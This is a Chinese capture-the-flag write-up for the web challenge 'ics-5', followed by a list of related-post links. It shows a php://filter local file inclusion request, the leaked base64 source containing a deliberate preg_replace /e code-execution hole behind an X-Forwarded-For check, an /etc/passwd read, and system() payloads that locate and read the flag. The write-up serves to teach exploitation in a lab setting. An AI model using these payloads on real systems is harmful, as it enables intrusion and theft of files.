攻防世界ics-5wp
2024-06-27 22:21:20
0x01 ics-5
浏览只有一个index页面,想到down源码,无果。
查看源代码发现有个page参数可以传值,利用LFI来查看源码。
/index.php?page=php://filter/read=convert.base64-encode/resource=index.php
读到base64加密的源码
PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwoKQHNlc3Npb25fc3RhcnQoKTsKcG9zaXhfc2V0dWlkKDEwMDApOwoKCj8+CjwhRE9DVFlQRSBIVE1MPgo8aHRtbD4KCjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgogICAgPG1ldGEgbmFtZT0icmVuZGVyZXIiIGNvbnRlbnQ9IndlYmtpdCI+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPWVkZ2UsY2hyb21lPTEiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLCBtYXhpbXVtLXNjYWxlPTEiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJsYXl1aS9jc3MvbGF5dWkuY3NzIiBtZWRpYT0iYWxsIj4KICAgIDx0aXRsZT7orr7lpIfnu7TmiqTkuK3lv4M8L3RpdGxlPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDx1bCBjbGFzcz0ibGF5dWktbmF2Ij4KICAgICAgICA8bGkgY2xhc3M9ImxheXVpLW5hdi1pdGVtIGxheXVpLXRoaXMiPjxhIGhyZWY9Ij9wYWdlPWluZGV4Ij7kupHlubPlj7Dorr7lpIfnu7TmiqTkuK3lv4M8L2E+PC9saT4KICAgIDwvdWw+CiAgICA8ZmllbGRzZXQgY2xhc3M9ImxheXVpLWVsZW0tZmllbGQgbGF5dWktZmllbGQtdGl0bGUiIHN0eWxlPSJtYXJnaW4tdG9wOiAzMHB4OyI+CiAgICAgICAgPGxlZ2VuZD7orr7lpIfliJfooag8L2xlZ2VuZD4KICAgIDwvZmllbGRzZXQ+CiAgICA8dGFibGUgY2xhc3M9ImxheXVpLWhpZGUiIGlkPSJ0ZXN0Ij48L3RhYmxlPgogICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2h0bWwiIGlkPSJzd2l0Y2hUcGwiPgogICAgICAgIDwhLS0g6L+Z6YeM55qEIGNoZWNrZWQg55qE54q25oCB5Y+q5piv5ryU56S6IC0tPgogICAgICAgIDxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ic2V4IiB2YWx1ZT0ie3tkLmlkfX0iIGxheS1za2luPSJzd2l0Y2giIGxheS10ZXh0PSLlvIB85YWzIiBsYXktZmlsdGVyPSJjaGVja0RlbW8iIHt7IGQuaWQ9PTEgMDAwMyA/ICdjaGVja2VkJyA6ICcnIH19PgogICAgPC9zY3JpcHQ+CiAgICA8c2NyaXB0IHNyYz0ibGF5dWkvbGF5dWkuanMiIGNoYXJzZXQ9InV0Zi04Ij48L3NjcmlwdD4KICAgIDxzY3JpcHQ+CiAgICBsYXl1aS51c2UoJ3RhYmxlJywgZnVuY3Rpb24oKSB7CiAgICAgICAgdmFyIHRhYmxlID0gbGF5dWkudGFibGUsCiAgICAgICAgICAgIGZvcm0gPSBsYXl1aS5mb3JtOwoKICAgICAgICB0YWJsZS5yZW5kZXIoewogICAgICAgICAgICBlbGVtOiAnI3Rlc3QnLAogICAgICAgICAgICB1cmw6ICcvc29tcnRoaW5nLmpzb24nLAogICAgICAgICAgICBjZWxsTWluV2lkdGg6IDgwLAogICAgICAgICAgICBjb2xzOiBbCiAgICAgICAgICAgICAgICBbCiAgICAgICAgICAgICAgICAgICAgeyB0eXBlOiAnbnVtYmVycycgfSwKICAgICAgICAgICAgICAgICAgICAgeyB0eXBlOiAnY2hlY2tib3gnIH0sCiAgICAgICAgICAgICAgICAgICAgIHsgZmllbGQ6ICdpZCcsIHRpdGxlOiAnSUQnLCB3aWR0aDogMTAwLCB1bnJlc2l6ZTogdHJ1ZSwgc29ydDogdHJ1ZSB9LAogICAgICAgICAgICAgICAgICAgICB7IGZpZWxkOiAnbmFtZScsIHRpdGxlOiAn6K6+5aSH5ZCNJywgdGVtcGxldDogJyNuYW1lVHBsJyB9LAogICAgICAgICAgICAgICAgICAgICB7IGZpZWxkOiAnYXJlYScsIHRpdGxlOiAn5Yy65Z+fJyB9LAogICAgICAgICAgICAgICAgICAgICB7IGZpZWxkOiAnc3RhdHVzJywgdGl0bGU6ICfnu7TmiqTnirbmgIEnLCBtaW5XaWR0aDogMTIwLCBzb3J0OiB0cnVlIH0sCiAgICAgICAgICAgICAgICAgICAgIHsgZmllbGQ6ICdjaGVjaycsIHRpdGxlOiAn6K6+5aSH5byA5YWzJywgd2lkdGg6IDg1LCB0ZW1wbGV0OiAnI3N3aXRjaFRwbCcsIHVucmVzaXplOiB0cnVlIH0KICAgICAgICAgICAgICAgIF0KICAgICAgICAgICAgXSwKICAgICAgICAgICAgcGFnZTogdHJ1ZQogICAgICAgIH0pOwogICAgfSk7CiAgICA8L3NjcmlwdD4KICAgIDxzY3JpcHQ+CiAgICBsYXl1aS51c2UoJ2VsZW1lbnQnLCBmdW5jdGlvbigpIHsKICAgICAgICB2YXIgZWxlbWVudCA9IGxheXVpLmVsZW1lbnQ7IC8v5a+86Iiq55qEaG92ZXLmlYjmnpzjgIHkuoznuqfoj5zljZXnrYnlip/og73vvIzpnIDopoHkvp3otZZlbGVtZW505qih5Z2XCiAgICAgICAgLy/nm5HlkKzlr7zoiKrngrnlh7sKICAgICAgICBlbGVtZW50Lm9uKCduYXYoZGVtbyknLCBmdW5jdGlvbihlbGVtKSB7CiAgICAgICAgICAgIC8vY29uc29sZS5sb2coZWxlbSkKICAgICAgICAgICAgbGF5ZXIubXNnKGVsZW0udGV4dCgpKTsKICAgICAgICB9KTsKICAgIH0pOwogICAgPC9zY3JpcHQ+Cgo8P3BocAoKJHBhZ2UgPSAkX0dFVFtwYWdlXTsKCmlmIChpc3NldCgkcGFnZSkpIHsKCgoKaWYgKGN0eXBlX2FsbnVtKCRwYWdlKSkgewo/PgoKICAgIDxiciAvPjxiciAvPjxiciAvPjxiciAvPgogICAgPGRpdiBzdHlsZT0idGV4dC1hbGlnbjpjZW50ZXIiPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj48P3BocCBlY2hvICRwYWdlOyBkaWUoKTs/PjwvcD4KICAgIDxiciAvPjxiciAvPjxiciAvPjxiciAvPgoKPD9waHAKCn1lbHNlewoKPz4KICAgICAgICA8YnIgLz48YnIgLz48YnIgLz48YnIgLz4KICAgICAgICA8ZGl2IHN0eWxlPSJ0ZXh0LWFsaWduOmNlbnRlciI+CiAgICAgICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgICAgICAgIDw/cGhwCgogICAgICAgICAgICAgICAgaWYgKHN0cnBvcygkcGFnZSwgJ2lucHV0JykgPiAwKSB7CiAgICAgICAgICAgICAgICAgICAgZGllKCk7CiAgICAgICAgICAgICAgICB9CgogICAgICAgICAgICAgICAgaWYgKHN0cnBvcygkcGFnZSwgJ3RhOnRleHQnKSA+IDApIHsKICAgICAgICAgICAgICAgICAgICBkaWUoKTsKICAgICAgICAgICAgICAgIH0KCiAgICAgICAgICAgICAgICBpZiAoc3RycG9zKCRwYWdlLCAndGV4dCcpID4gMCkgewogICAgICAgICAgICAgICAgICAgIGRpZSgpOwogICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgIGlmICgkcGFnZSA9PT0gJ2luZGV4LnBocCcpIHsKICAgICAgICAgICAgICAgICAgICBkaWUoJ09rJyk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgaW5jbHVkZSgkcGFnZSk7CiAgICAgICAgICAgICAgICAgICAgZGllKCk7CiAgICAgICAgICAgICAgICA/PgogICAgICAgIDwvcD4KICAgICAgICA8YnIgLz48YnIgLz48YnIgLz48YnIgLz4KCjw/cGhwCn19CgoKLy/mlrnkvr/nmoTlrp7njrDovpPlhaXovpPlh7rnmoTlip/og70s5q2j5Zyo5byA5Y+R5Lit55qE5Yqf6IO977yM5Y+q6IO95YaF6YOo5Lq65ZGY5rWL6K+VCgppZiAoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10gPT09ICcxMjcuMC4wLjEnKSB7CgogICAgZWNobyAiPGJyID5XZWxjb21lIE15IEFkbWluICEgPGJyID4iOwoKICAgICRwYXR0ZXJuID0gJF9HRVRbcGF0XTsKICAgICRyZXBsYWNlbWVudCA9ICRfR0VUW3JlcF07CiAgICAkc3ViamVjdCA9ICRfR0VUW3N1Yl07CgogICAgaWYgKGlzc2V0KCRwYXR0ZXJuKSAmJiBpc3NldCgkcmVwbGFjZW1lbnQpICYmIGlzc2V0KCRzdWJqZWN0KSkgewogICAgICAgIHByZWdfcmVwbGFjZSgkcGF0dGVybiwgJHJlcGxhY2VtZW50LCAkc3ViamVjdCk7CiAgICB9ZWxzZXsKICAgICAgICBkaWUoKTsKICAgIH0KCn0KCgoKCgo/PgoKPC9ib2R5PgoKPC9odG1sPgo=
解码后发现源码中
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {echo "<br >Welcome My Admin ! <br >";$pattern = $_GET[pat];$replacement = $_GET[rep];$subject = $_GET[sub];if (isset($pattern) && isset($replacement) && isset($subject)) {preg_replace($pattern, $replacement, $subject);}else{die();}
于是伪造ip
接着利用文件包含漏洞
/index.php?page=../../../etc/passwd
读取到
最后利用preg_replace /e代码执行漏洞 具体参考深入研究PHP中的preg_replace和代码执行
preg_replace( pattern , replacement , subject ) : 当pattern指明/e标志时 ,preg_replace()会将replacement部分的代码当作PHP代码执行 (简单的说就是将replacement参数值放入eval()结构中)
payload:
/index.php?pat=/test/e&rep=phpinfo()&sub=test
/index.php?pat=/test/e&rep=system('find / -iname flag')&sub=test
查找flag文件
最终payload:
?pat=/test/e&rep=system('cat /var/www/html/s3chahahaDir/flag/flag.php')&sub=test
攻防世界ics-5wp相关推荐
- 【攻防世界001】Guess-the-Number
攻防世界之前刷了几十题了,没写wp,感觉很简单没啥意思.后来参加了几次比赛,发现有点干不动,决定还是老老实实刷题好了.这是第一篇wp,这题很简单,是个jar,用jd-gui可以得到java源码. 原来 ...
- 攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制
ctf(pwn) canary保护机制讲解 与 破解方法介绍 程序执行流程 有三个选项,1是利用栈溢出,2是利用格式化字符串,3是退出;可连续输入多次; IDA分析 解题思路 程序存在canary保护 ...
- 攻防世界(Pwn) forgot---栈溢出;(方法二)
攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...
- 攻防世界(Pwn) forgot---栈溢出;(方法一)
攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...
- 攻防世界misc新手_[攻防世界]mobile新手练习区easy-apk
[攻防世界]mobile新手练习区easy-apk easy-apk最佳Writeup由129师386旅独立团 • devi1提供 难度系数: 7.0 题目来源: 暂无 题目描述:无 题目场景: 暂无 ...
- 攻防世界 ——crypto
目录 新手区部分题解: 1,easy_RSA 2,Normal_RSA 3, 幂数加密 4,easy_ECC 高手进阶区部分题题解 5, ENC 6,告诉你个秘密 7,Easy-one 8,说我作弊需 ...
- 攻防世界———MISC 高手区题解
目录 1,base64stego 2,easycap 3,Avatar 4,What-is-this 5,签到题 6,Training-Stegano-1 7,Excaliflag 8,Get-the ...
- 攻防世界 web(二)
这周接着刷攻防世界的web题( ̄︶ ̄)↗ 1.command_execution 看提示这题为命令执行漏洞(command_execution),关于命令执行漏洞,我前面有篇博客详细介绍了,大家不了解 ...
- misc高阶 攻防世界_攻防世界 Misc 进阶题(一)
攻防世界 Misc 进阶题(一) 关于隐写术的思路或方法 转载: https://blog.csdn.net/a_small_rabbit/article/details/79644078 隐 ...
- [攻防世界 pwn]——pwn1(内涵peak小知识)
[攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...
最新文章
- java stack 从1.5开始?_java数据结构与算法之栈(Stack)设计与实现
- 【转载】Apache Spark Jobs 性能调优(二)
- linux服务安装框架,CentOS7安装经典Web架构:LAMP
- 一个SQL Server Sa密码破解的存储过程
- 集合-2(Set(HashSet、TreeSet、LinkedHashSet)、List(ArrayList、LinkedList、Vector)、Map(HashMap、TreeMap...))
- 报名|第2期“DI极客说”,揭秘决策AI创新应用带来的行业变革
- AAAI 2019 Oral | 让TA说你想听的—基于音/视频特征解离的讲述者人脸生成
- ASP.NET MVC3 Razor视图引擎-基础语法
- 【Linux】一步一步学Linux——gzip命令(63)
- Spring框架功能整体介绍
- VB winform自动更新 笔记
- 架构,框架,模式,模块、组件、插件的含义和区别
- 对于C# 中事件的参数(object sender, EventArgs e)
- spring 获取postman上传的二进制文件
- Web安全:XSS、CSRF以及如何防范
- 两边放动物对战守城的游戏_疯狂动物园小程序游戏:入口
- nupkg 本地安装_关于Visual Studio:如何在本地安装NuGet包.nupkg文件?
- 光环PMP 项目资源管理、项目相关方管理
- Java 设计模式 Builder 模式 链式编程
- 简单解决某盘限速?(黑科技)【油猴】+【某盘直链下载器】+【IDM下载】